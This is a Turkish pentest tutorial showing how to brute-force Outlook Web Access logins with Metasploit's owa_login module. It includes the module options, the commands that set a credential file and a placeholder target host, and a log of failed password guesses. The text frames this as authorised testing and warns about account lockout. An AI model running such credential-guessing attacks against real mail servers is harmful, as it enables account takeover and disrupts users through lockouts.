Pentest Çalışmalarında OWA(Outlook Web Access) Hesaplarını Bulma

Microsoft OWA(Outlook Web Access) kurumsal ortamlarda en fazla tercih edilen webmail uygulaması olarak karşımıza çıkmaktadır. Günümüz iş dünyasının en temel iletişim araçlarından birinin e-posta(mail olduğu düşünülürse dışarı açık OWA sistemlerinin büyük risk taşıdığı aşikardır.

Ele geçirilecek bir mail hesabı sadece sahibinin güvenliğini değil şirketin güvenliğini de tehlikeye atmaktadır. Basit mantıkla düşünülecek olursa ele geçirilmiş bir meil hesabı  üzerinden hem sosyal mühendislik saldırıları hem de şirket çalışanlarının tüm özlük bilgileri sızdırılabilir.

Bu nedenle pentest çalışmalarında e-posta hesaplarının tahmin yöntemiyle ele geçirilmesi adımı önemli rol oynamaktadır. 

Internet üzerinden indirilecek çoğu “brute force” yazılımı yeni nesil OWA sürümlerini desteklememekte ya da stabil çalışmamaktadır. Metasploit Aux modüllerine eklenen güncel modül -owa_login- kullanılabilir en sağlam hesap deneme yazılımı olarak gözükmekte. OWA brute force aux modülü kullanılarak OWA 2003, 2007 ve 2010 sürümlerine yönelik brute force çalışmaları gerçekleştirilebilmektedir.

NOT:OWA’ya yönelik gerçekleştirilecek brute force denemelerinde hesap kitleme riski bulunduğundan bu adımı denemeden önce mutlaka pentest yapılan firmanın bilgilendirilmesi gerekmektedir. 

Örnek Uygulama:

root@bt:/pentest/exploits/framework3# ./msfconsole
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ — –=[ 768 exploits – 406 auxiliary – 119 post
+ — –=[ 228 payloads – 27 encoders – 8 nops
=[ svn r14338 updated 15 days ago (2011.12.02)

msf > search owa

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility

msf > use auxiliary/scanner/http/owa_login
msf auxiliary(owa_login) > show options

Module options (auxiliary/scanner/http/owa_login):

Name Current Setting Required Description
—- ————— ——– ———–
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 443 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
VERSION 2007 yes OWA VERSION (2003, 2007, or 2010)
VHOST no HTTP server virtual host

show options komutu ile ekrana basılan seçenekler incelenirse bruteforce yapılırken ihtiyaç duyulabilecek bileşenlerin tamamına yakını bulunmaktadır . Detaylı ayar yapılması gerektiğinde show advanced komutu da kullanılabilir.

msf auxiliary(owa_login) > set USERPASS_FILE /root/owa_test

USERPASS_FILE => /root/owa_test
msf auxiliary(owa_login) > set RPORT 443
RPORT => 443
msf auxiliary(owa_login) > set VHOST mail.HEDEF_SITE.com.tr
VHOST => mail.HEDEF_SITE.com.tr
msf auxiliary(owa_login) > run
[*] mail.HEDEF_SITE.com.tr:0 OWA – Testing version 2010

[*] mail.HEDEF_SITE.com.tr:0 OWA – Trying ali : ali
-msf auxiliary(owa_login) > run

[*] mail.HEDEF_SITE.com.tr:443 OWA – Testing version 2010
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : HEDEF_SITE
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘HEDEF_SITE’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying ali : ali
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘ali’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying sam : sam
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘sam’ : ‘sam’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user : user
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘user’ : ‘user’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user@domain.com : user@domain.com
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘user@domain.com’ : ‘user@domain.com’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying ali : veli
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘veli’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying sam : john
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘sam’ : ‘john’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying ali : 12345
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘ali’ : ‘12345’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user : passwoed
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘user’ : ‘passwoed’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying user@domain.com : aliveli
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘user@domain.com’ : ‘aliveli’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : as
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘as’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : df
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘df’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : er
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘er’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : r
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘r’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : tt
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘tt’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE :
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ”
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : yu
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘yu’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : u
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘u’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : yy
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘yy’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : tg
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘tg’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : 3
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘3’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : 4
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘4’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : 45
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ’45’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : bt
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘bt’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : ertvt
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘ertvt’
[*] mail.HEDEF_SITE.com.tr:443 OWA – Trying HEDEF_SITE : grt
[-] mail.HEDEF_SITE.com.tr:443 OWA – FAILED LOGIN. ‘HEDEF_SITE’ : ‘grt’
[*] Auxiliary module execution completed